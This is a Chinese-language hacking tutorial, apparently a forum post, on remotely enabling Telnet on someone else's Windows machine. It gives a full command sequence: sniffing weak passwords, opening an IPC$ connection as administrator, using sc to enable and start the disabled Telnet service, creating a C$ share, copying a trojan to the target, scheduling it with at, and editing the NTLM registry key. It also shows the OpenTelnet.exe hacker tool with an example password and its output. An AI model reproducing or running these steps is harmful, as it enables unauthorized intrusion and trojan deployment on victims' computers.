远程开启对方telnet服务-SKING
1 首先用流光嗅探得到对方密码,主要是弱口令,强壮密码需要一个很好的密码字典和机器
性能以及网络速度以及耐心和运气,呵呵。
2 用net use命令建立ipc$连接例如:net use \\ip\ipc$ "" /user:administrator
3 用sc命令把禁用的telnet服务变成自动sc \\ip config tlntsvr start= auto
4 用sc命令将telnet启动sc \\ip start tlntsvr
5 telnet登录telnet ip
6 net share 建立c$共享net share sharename=drive:path
7 copy命令上传木马copy a.exe ip\c$
8 at命令定时执行at \\ip time cmd
注意:如果对方采用了NTLM认证策略,可以连接网络注册表修改HKEYLOCAL\ MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER\1.0下的NTLM键值
由2改为0。
然后重新启动telnet服务。
有些朋友喜欢使用opentelnet远程开启telnet,其实道理一样,关键的问题还是要在之前
获得帐户和密码。
OpenTelnet.exe是用来启动远程服务器的Telnet的工具软件,是一个黑客工具,很多网站
有下载。
Opentelnet.exe的用法:
OpenTelnet.exe \\server <帐号> <密码>
比如下面的:(命令意思是连接192.168.1.2,帐号administrator,密码123456 ,0表示
不使用NTLM认证方式,
Telnet的端口是90)
C:\>OpenTelnet.exe \\ip administrator 123456 0 90
当程序运行后得到:
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
就说明Telnet服务启动成功,并且使用的端口是90。这样,我们就能够得到一个开90端
口的Windows 2000
Telnet服务
有几个小问题要注意一下:
1 在xpsp2当中,默认的本地安全策略中,已经设置了网络访问模式为“仅来宾”,而在帐
户管理中,guest帐户是被禁用的。
2 在win03当中,默认的本地安全策略中,已经设置了网络访问模式为“经典”,而帐户管
理中,guest帐户仍然是禁用的。
3 在使用net use命令的时候,往往是连接ipc$,需要有用户名和密码,所以不管是xp还是
03中,需要把策略设置为经典。
4 检查一下共享,ipc$等等是否已经开启
***********************************************************2003中开启很多服务
***********************************
使用SC命令远程开启计算机的服务
SC其实是一个命令工具而已,它具备开启计算机服务的功能,早期都把它认为是黑客工具,而在Windows 2003中将这个命令内置在操作系统中,可以使用它远程开启其他计算机的服务,包
括了系统上已经禁用的服务
下面介绍该工具的使用,开启远程主机192.168.1.202的telnet服务(需要知道该主机的用户
名和密码):
1.首先使用sc \\19
2.168.1.202 query tlntsvr来查看远程主机的telnet的服务状态,得到结果
是stopped(已停止)
2.然后使用sc \\192.168.1.202 qc tlntsvr 查询当前的telnet服务的配置状况,发现是
disabled(已禁用)
3.使用sc \\192.168.1.202 config tlntsvr start= auto使telnet服务开机自动启动
4.使用sc \\192.168.1.202 qc tlntsvr 查询经过配置的telnet服务是否已经发生改变,已经成
为auto_start(自动启动)
5.使用sc \\192.168.1.202 start tlntsvr 来启动telnet服务
6.使用sc \\192.168.1.202 query tlntsvr 查看telnet服务是否已经在运行
7.接下来就可以使用telnet 192.168.1.202进行telnet了
